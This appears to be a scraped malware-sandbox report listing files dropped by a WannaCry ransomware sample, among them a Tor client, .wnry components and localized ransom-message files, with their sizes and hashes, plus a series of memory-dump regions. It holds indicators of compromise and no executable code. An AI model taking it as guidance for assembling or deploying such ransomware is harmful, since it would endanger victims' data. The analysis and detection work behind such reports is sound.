aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]

Filesize
933B

MD5
f97d2e6f8d820dbd3b66f21137de4f09

SHA1
596799b75b5d60aa9cd45646f68e9c0bd06df252

SHA256
0e5ece918132a2b1a190906e74becb8e4ced36eec9f9d1c70f5da72ac4c6b92a

SHA512
efda21d83464a6a32fdeef93152ffd32a648130754fdd3635f7ff61cc1664f7fc050900f0f871b0ddd3a3846222bf62ab5df8eed42610a76be66fff5f7b4c4c0

Download Submit
C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\b.wnry

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\c.wnry

Filesize
780B

MD5
383a85eab6ecda319bfddd82416fc6c2

SHA1
2a9324e1d02c3e41582bf5370043d8afeb02ba6f

SHA256
079ce1041cbffe18ff62a2b4a33711eda40f680d0b1d3b551db47e39a6390b21

SHA512
c661e0b3c175d31b365362e52d7b152267a15d59517a4bcc493329be20b23d0e4eb62d1ba80bb96447eeaf91a6901f4b34bf173b4ab6f90d4111ea97c87c1252

Download Submit
C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\msg\m_bulgarian.wnry

Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\msg\m_chinese (simplified).wnry

Filesize
53KB

MD5
0252d45ca21c8e43c9742285c48e91ad

SHA1
5c14551d2736eef3a1c1970cc492206e531703c1

SHA256
845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

SHA512
1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

Download Submit
C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\msg\m_chinese (traditional).wnry

Filesize
77KB

MD5
2efc3690d67cd073a9406a25005f7cea

SHA1
52c07f98870eabace6ec370b7eb562751e8067e9

SHA256
5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

SHA512
0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

Download Submit
C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\msg\m_croatian.wnry

Filesize
38KB

MD5
17194003fa70ce477326ce2f6deeb270

SHA1
e325988f68d327743926ea317abb9882f347fa73

SHA256
3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

SHA512
dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

Download Submit
C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\msg\m_czech.wnry

Filesize
39KB

MD5
537efeecdfa94cc421e58fd82a58ba9e

SHA1
3609456e16bc16ba447979f3aa69221290ec17d0

SHA256
5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

SHA512
e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

Download Submit
C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\msg\m_danish.wnry

Filesize
36KB

MD5
2c5a3b81d5c4715b7bea01033367fcb5

SHA1
b548b45da8463e17199daafd34c23591f94e82cd

SHA256
a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

SHA512
490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

Download Submit
C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\msg\m_dutch.wnry

Filesize
36KB

MD5
7a8d499407c6a647c03c4471a67eaad7

SHA1
d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

SHA256
2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

SHA512
608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

Download Submit
C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat

Filesize
280B

MD5
580d903d328ef6a988bd9342cc15992e

SHA1
a200913ede1e65120868c6d097b56b042caca5fe

SHA256
8c4d7d10c8bc7cd3fc4064d31b6811a25a88216ec8e853e3a36dffeb8ce7130e

SHA512
8f9e1d7759090143be1fe7bc2bc31e60a8ac2c534f3891c77d065b7400b8b3c786333dd7b0e12e88235429bb417132dc6537b9abd57421074bf0cd5cf35d9a9a

Download Submit
memory/2400-4965-0x00000000742D0000-0x00000000742F2000-memory.dmp

Filesize
136KB

Download
memory/2400-5042-0x0000000000B80000-0x0000000000E7E000-memory.dmp

Filesize
3.0MB

Download
memory/2400-4967-0x0000000073FA0000-0x00000000741BC000-memory.dmp

Filesize
2.1MB

Download
memory/2400-4966-0x00000000741C0000-0x0000000074237000-memory.dmp

Filesize
476KB

Download
memory/2400-4922-0x0000000000B80000-0x0000000000E7E000-memory.dmp

Filesize
3.0MB

Download
memory/2400-4919-0x0000000073FA0000-0x00000000741BC000-memory.dmp

Filesize
2.1MB

Download
memory/2400-4964-0x0000000074300000-0x0000000074382000-memory.dmp

Filesize
520KB

Download
memory/2400-4963-0x0000000074240000-0x00000000742C2000-memory.dmp

Filesize
520KB

Download
memory/2400-4962-0x0000000074390000-0x00000000743AC000-memory.dmp

Filesize
112KB

Download
memory/2400-5214-0x0000000000B80000-0x0000000000E7E000-memory.dmp

Filesize
3.0MB

Download
memory/2400-5012-0x0000000000B80000-0x0000000000E7E000-memory.dmp

Filesize
3.0MB

Download
memory/2400-4961-0x0000000000B80000-0x0000000000E7E000-memory.dmp

Filesize
3.0MB

Download
memory/2400-5048-0x0000000073FA0000-0x00000000741BC000-memory.dmp

Filesize
2.1MB

Download
memory/2400-5074-0x0000000000B80000-0x0000000000E7E000-memory.dmp

Filesize
3.0MB

Download
memory/2400-4921-0x00000000742D0000-0x00000000742F2000-memory.dmp

Filesize
136KB

Download
memory/2400-5080-0x0000000073FA0000-0x00000000741BC000-memory.dmp

Filesize
2.1MB

Download
memory/2400-4920-0x0000000074240000-0x00000000742C2000-memory.dmp

Filesize
520KB

Download
memory/2400-5101-0x0000000073FA0000-0x00000000741BC000-memory.dmp

Filesize
2.1MB

Download
memory/2400-4918-0x0000000074300000-0x0000000074382000-memory.dmp

Filesize
520KB

Download
memory/2400-5090-0x0000000000B80000-0x0000000000E7E000-memory.dmp

Filesize
3.0MB

Download
memory/2400-5157-0x0000000000B80000-0x0000000000E7E000-memory.dmp

Filesize
3.0MB

Download
memory/2400-5189-0x0000000000B80000-0x0000000000E7E000-memory.dmp

Filesize
3.0MB

Download
memory/2400-5195-0x0000000073FA0000-0x00000000741BC000-memory.dmp

Filesize
2.1MB

Download
memory/5356-3384-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download